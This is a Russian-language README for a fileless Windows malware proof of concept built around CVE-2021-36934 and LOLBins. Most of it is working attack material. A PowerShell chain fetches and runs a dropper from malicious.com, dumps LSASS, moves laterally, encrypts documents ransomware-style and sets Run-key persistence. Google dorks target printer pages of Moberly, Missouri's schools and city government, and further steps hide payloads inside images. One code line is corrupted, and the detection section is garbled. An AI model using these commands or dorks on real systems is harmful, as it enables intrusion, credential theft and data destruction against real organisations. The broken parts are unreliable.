
PoC-вредонос, использующий эксплойт CVE-2021-36934 (неправильные ACL на теневых копиях) с помощью бесфайлового метода red team на Windows 10/11 и LOLBins, извлекая кусты SYSTEM и SAM для локальных NTLM-хешей.

CVE-2021-36934/HiveNightmare — это образовательный исследовательский проект для red/purple team, который моделирует бесфайловую атаку вредоносного ПО на Windows 11. Он позволяет эмулировать реальные цепочки убийств (kill chains) противников с использованием техник MITRE ATT&CK, с акцентом на скрытые, бесфайловые операции.
Предупреждение: Только для исследований и обучения в изолированных лабораториях. Не используйте в производственных или несанкционированных системах.
Следующая имитация PowerShell демонстрирует типичную цепочку бесфайловой атаки программы-вымогателя с использованием встроенных инструментов Windows (LOLBins):
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")
# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]")
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/HEAD/:Load($bytes)
# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs
# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full
# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"
# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
$data = Get-Content $file.FullName -Raw
$aes = New-Object System.Security.Cryptography.AesManaged
$aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
$aes.IV = New-Object byte[] 16
$enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}
# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"
Пример цели: Найти общедоступные службы печати в Moberly, штат Миссури, потенциально уязвимые для эксплойтов типа PrintNightmare.
Примеры запросов Google Dork:
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"
Living Off the Land Binaries (LOLBins) — это легитимные, доверенные двоичные файлы Windows, которые обычно используются злоумышленниками для обхода средств безопасности и бесфайлового выполнения вредоносного кода.
Пример использования (атака на службу печати):
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry
Злоумышленники используют LOLBins, такие как
rundll32.exe,regsvr32.exeиpowershell.exe, для выполнения полезной нагрузки из сетевых ресурсов, часто после выявления открытых принтеров или серверов с помощью разведки.
Цель: Скрытно доставлять полезные нагрузки, встраивая архивы внутрь изображений и извлекая их с помощью встроенных инструментов.
Шаги:
Встроить полезную нагрузку:
copy /b nsfw.jpg + payload.7z nsfw.jpg
Извлечь и декодировать:
certutil -decode nsfw.jpg dropper.7z
7z x dropper.7z -oC:\Users\Public\
Этот метод обходит традиционную фильтрацию по расширениям файлов и использует встроенные инструменты для уклончивой доставки.
Техника: Загрузка и выполнение вредоносной DLL непосредственно в памяти с помощью отражающей загрузки (reflective loading).
Пример:
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry
Это обеспечивает скрытое выполнение в памяти без оставления артефактов на диске.
Sysmon + Sigma Rules:
rundll32.execertutil.exe, regsvr32.exe, mshta.exeПримеры SIEM (ELK/Splunk):
explorer.exe запускает rundll32.exe)Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
Весь контент, код и методы, представленные в этом репозитории, предназначены только для образовательных и разрешенных тестов на проникновение. Не используйте любую часть этого проекта вне контролируемых, изолированных сред без явного разрешения. Авторы не несут ответственности за неправомерное использование.
Будьте в безопасности, исследуйте ответственно и всегда действуйте законно и этично.
| Фаза | Техника | ID | Описание |
|---|
| Начальный доступ | Допустимые учетные записи / Компрометация через браузер | T1078, T1189 | Компрометация общедоступных интерфейсов печати |
| Выполнение | DLL Side-Loading / LOLBins | T1218, T1055.001 | Запуск DLL через отражающую загрузку с помощью доверенных файлов |
| Повышение привилегий | Эксплойты Print Spooler / Злоупотребление ACL SAM | T1068, T1003.002 | Доступ уровня SYSTEM и извлечение хэшей SAM |
| Обход защиты | Бесфайловое выполнение / Обфусцированные файлы | T1027, T1202 | Закодированные полезные нагрузки, доставляемые через certutil, mshta и т.д. |
| Доступ к учетным данным | Дамп LSASS / Доступ к кусту SAM | T1003 | Извлечение учетных данных после HiveNightmare |
| Горизонтальное перемещение | Перечисление сетевых ресурсов SMB/Net Share | T1021.002 | Распространение через общие принтеры или перечисление спулера |
| Воздействие | Уничтожение / Шифрование данных | T1485, T1486 | Бесфайловый стиратель, активируемый через полезные нагрузки DLL |